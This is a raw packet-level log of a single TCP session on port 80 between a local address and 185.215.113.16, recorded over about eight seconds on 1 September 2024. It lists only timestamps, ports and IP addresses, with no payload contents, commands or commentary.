Sep 1, 2024 20:09:28.133105993 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.133116007 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.133126020 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.133152008 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:28.133167028 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:28.343849897 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.343872070 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.343911886 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:28.344108105 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:28.344459057 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.344499111 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:28.344527960 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.344538927 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.344572067 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:28.344584942 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:28.344731092 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.344780922 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:28.344782114 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.344826937 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:28.344917059 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.344929934 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.344969988 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:29.160528898 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.160581112 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:29.160665035 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.160711050 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:29.355021000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.355074883 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.355086088 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.355182886 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:29.355182886 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:29.561852932 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.561877966 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.561891079 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.561923027 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:29.561949968 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:29.562114954 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.562127113 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.562165022 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:29.752475023 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.752620935 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.752633095 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.752696037 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:29.752696037 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:29.752696037 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:29.752724886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.752769947 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:29.752783060 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:29.752830029 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.034148932 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.034213066 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.035082102 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.035129070 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.228574038 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.228744030 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.228883028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.228959084 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.310779095 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.310791969 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.310839891 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.449982882 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.449995995 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.450005054 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.450062037 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.450083017 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.450094938 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.450097084 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.450107098 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.450118065 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.450133085 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.450159073 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.686467886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.686511040 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.686528921 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.686534882 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.686556101 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.686584949 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.686675072 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.686722994 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.770977974 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.771044970 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.771078110 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.771122932 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.885643005 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.885699034 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.885710955 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.885710955 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.885741949 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.885756969 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:31.885940075 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.885951996 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:31.885993958 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.082974911 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.082988977 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.083000898 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.083070040 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.083082914 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.083091974 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.083136082 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.083136082 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.083137035 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.083456039 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.083483934 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.083499908 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.083503962 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.083514929 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.083553076 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.304435968 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.304485083 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.304498911 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.304508924 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.304529905 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.304548025 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.304697990 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.304711103 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.304749012 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.387691021 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.387747049 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.387784004 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.387825966 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.724699974 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.724747896 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.724760056 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.724788904 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.724814892 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.724972963 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.724983931 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.724993944 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.725006104 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.725018024 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.725023985 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.725047112 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.725090027 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.725995064 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.726011038 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.726054907 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.809005976 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.809079885 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.809289932 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.938270092 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.938317060 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:32.938486099 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:32.938532114 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.001092911 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.001147032 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.001161098 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.001173973 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.001204967 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.001215935 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.085544109 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.085582972 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.085712910 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.085712910 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.158792019 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.158853054 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.158857107 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.158869982 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.158890009 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.158905983 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.159076929 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.159089088 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.159126997 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.250329971 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.250399113 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.250422001 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.250550985 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.334923029 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.335076094 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.337409019 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.347259998 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.347327948 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.347338915 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.347342968 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.347472906 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.347484112 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.347493887 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.347517014 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.347517014 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.347532988 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.517591000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.517766953 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.517802000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.517851114 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.938425064 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.938621044 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:33.940064907 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:33.940118074 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:34.154812098 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:34.154860020 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:34.154867887 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:34.154881001 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:34.154908895 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:34.154921055 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:34.792901993 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:34.793062925 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:34.793096066 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:34.793117046 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:34.992289066 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:34.992392063 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:34.992400885 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:34.992454052 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:34.992454052 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:34.992477894 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:34.992495060 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:34.992522955 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:34.992549896 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.206872940 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.206887007 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.206947088 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.249862909 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.249877930 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.249888897 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.249924898 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.249955893 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.291570902 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.291609049 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.291636944 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.291649103 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.423906088 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.423952103 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.423963070 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.423998117 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.424027920 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.454437971 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.454516888 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.454520941 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.454557896 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.454583883 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.454624891 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.454627991 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.454668045 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.614981890 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.615149975 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.615158081 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.615191936 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.615309000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.615359068 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.615758896 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.615811110 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.638122082 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.638212919 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.638222933 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.638293028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.638303041 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.638303041 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.638339043 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.809104919 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.809127092 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.809165001 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.809178114 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.836863041 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.836941957 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.836942911 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.836956978 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.836991072 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.837003946 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.837157965 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.837169886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:35.837208033 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:35.837220907 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.032063007 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.032114983 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.032198906 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.032211065 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.032246113 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.032282114 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.050074100 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.050117970 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.050122023 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.050163984 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.050331116 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.050343037 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.050353050 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.050370932 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.050394058 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.243097067 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.243108988 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.243124962 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.243149042 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.243163109 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.243201971 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.264491081 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.264525890 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.264544010 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.264578104 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.264619112 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.264640093 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.264651060 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.264688015 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.429258108 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.429271936 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.429394007 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.429394007 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.457251072 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.457263947 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.457274914 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.457387924 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.457400084 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.457410097 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.457421064 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.457432032 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.457432032 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.457448006 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.457472086 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.622441053 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.622555971 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.622601032 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.622632027 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.654042006 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.654073000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.654083967 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.654108047 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.654126883 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.654340982 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.654352903 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.654395103 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.654483080 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.654491901 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.654531002 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.707948923 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.708100080 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.708116055 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.708153009 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.826318026 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.826344013 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.826353073 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.826371908 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.826473951 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.826473951 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.826473951 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.865729094 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.865741014 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.865750074 CEST	80	49738	185.215.113.16	192.168.2.4
